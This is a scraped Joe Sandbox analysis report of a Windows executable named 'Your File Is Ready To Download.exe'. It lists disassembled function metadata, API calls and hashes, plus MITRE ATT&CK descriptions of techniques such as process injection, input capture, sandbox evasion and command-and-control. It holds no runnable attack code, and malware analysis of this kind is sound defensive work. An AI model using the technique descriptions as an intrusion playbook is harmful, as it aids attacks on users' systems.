msctls_statusbar321, xrefs: 000000014004D116

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ForegroundVisible_errno_invalid_parameter_noinfo_wcstoi64wcsncpy
String ID: msctls_statusbar321
API String ID: 2487935071-1022929942
Opcode ID: 901a970e483e7d24ea76181902aa1374b73b1145f713189385beeaae1114a542
Instruction ID: 39ac98f4a3b340eb3b48575ce1749024335d132b683da1ed3dd312caaee4f50d
Opcode Fuzzy Hash: 901a970e483e7d24ea76181902aa1374b73b1145f713189385beeaae1114a542
Instruction Fuzzy Hash: 9831C071618780A5E62AEF23A4147DA6366FB8DBC0F094136BF5953BBADE38C541CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140080140, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 0000000140080179
SHFileOperationW.SHELL32 ref: 00000001400801F1

Strings

\, xrefs: 0000000140080197

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: FileFullNameOperationPath
String ID: \
API String ID: 1380555793-2967466578
Opcode ID: e69c66a4a714aa87cae72ec4132bd44d89f59a37300e6cc546941bd37a2fce47
Instruction ID: 4b82e0dbfe10f2120e0db539cea8ba780252173caacf2be57ed45a088888402c
Opcode Fuzzy Hash: e69c66a4a714aa87cae72ec4132bd44d89f59a37300e6cc546941bd37a2fce47
Instruction Fuzzy Hash: B121C676208B84C2EB51CB21E44439AB3A4FB897A0F104325FBB813AE8DB7CC595CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014006A010, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32 ref: 000000014006A056
FileTimeToSystemTime.KERNEL32 ref: 000000014006A069

Part of subcall function 00000001400C959C: _errno.LIBCMT ref: 00000001400C95D4
Part of subcall function 00000001400C959C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C95DF

Strings

%04d%02d%02d%02d%02d%02d, xrefs: 000000014006A09F

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Time$File$LocalSystem_errno_invalid_parameter_noinfo
String ID: %04d%02d%02d%02d%02d%02d
API String ID: 261180415-4847443
Opcode ID: 8542bd54ba761e163d0f438b97cc5fb87815d33d9e571f47845f86df1711d679
Instruction ID: fc591ccccb5ec658384044dc44831f944e32bc7d5b9a5f12ea931fda1b58e7d8
Opcode Fuzzy Hash: 8542bd54ba761e163d0f438b97cc5fb87815d33d9e571f47845f86df1711d679
Instruction Fuzzy Hash: F6118432208680C6EB659F15E4403EEB371FB89BA4F144626FBA943AE8DB7DC054DB11

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001F0F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 000000014001F1A1
Shell_NotifyIconW.SHELL32 ref: 000000014001F1B8

Strings

AutoHotkey, xrefs: 000000014001F186

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: IconNotifyShell_wcsncpy
String ID: AutoHotkey
API String ID: 1496823222-348589305
Opcode ID: 88e03fc78e9fa20efee9382104734a557ba2884c4873140b13ee5282d9f532d6
Instruction ID: 7c3b2a7d7b27d2fa6ad9455f20b5cfacfbe0fbc92e48ed228ae84a3ad4c15036
Opcode Fuzzy Hash: 88e03fc78e9fa20efee9382104734a557ba2884c4873140b13ee5282d9f532d6
Instruction Fuzzy Hash: 292167B2304B80E6EB4DCF62E544799B3A0F748BC0F04912AEB6D47765EF78E5A08700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008C075, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 000000014008C09B
SendMessageW.USER32 ref: 000000014008C0AA

Strings

+, xrefs: 000000014008C075

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessageSend
String ID: +
API String ID: 3850602802-2126386893
Opcode ID: 1d063ba8f3d3cd32ba78883b3da571832170b377909a5551c410d314d88c1fd2
Instruction ID: 5aee8a1cfd75c665dd8fe8319e52013841c99d3050363b3424eb9b4d84c5809c
Opcode Fuzzy Hash: 1d063ba8f3d3cd32ba78883b3da571832170b377909a5551c410d314d88c1fd2
Instruction Fuzzy Hash: 18F02B7322458183F3329729A410BAE1692D78D3D6F114124FB810BAF6DE39C8428754

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Your File Is Ready To Download.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Static AutoHotKey Info

General

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 000000014001E310, Relevance: 72.1, APIs: 35, Strings: 6, Instructions: 309
windowsleepsynchronizationCOMMON

Function 0000000140055950, Relevance: 61.7, APIs: 33, Strings: 2, Instructions: 455
registrywindowCOMMON

Function 000000014001EB30, Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 228
windowregistryCOMMON

Function 00000001400D1724, Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 465
COMMONLIBRARYCODE

Function 000000014007D8A0, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 230
networkfilewindowCOMMON

Function 000000014000CF50, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 150
sleepsynchronizationwindowCOMMON

Function 0000000140016300, Relevance: 28.8, APIs: 19, Instructions: 291
keyboardwindowCOMMON

Function 0000000140018A20, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 200
sleepwindowthreadCOMMON

Function 0000000140016D90, Relevance: 19.9, APIs: 13, Instructions: 363
threadCOMMON

Function 000000014001F300, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 316
timeCOMMON

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre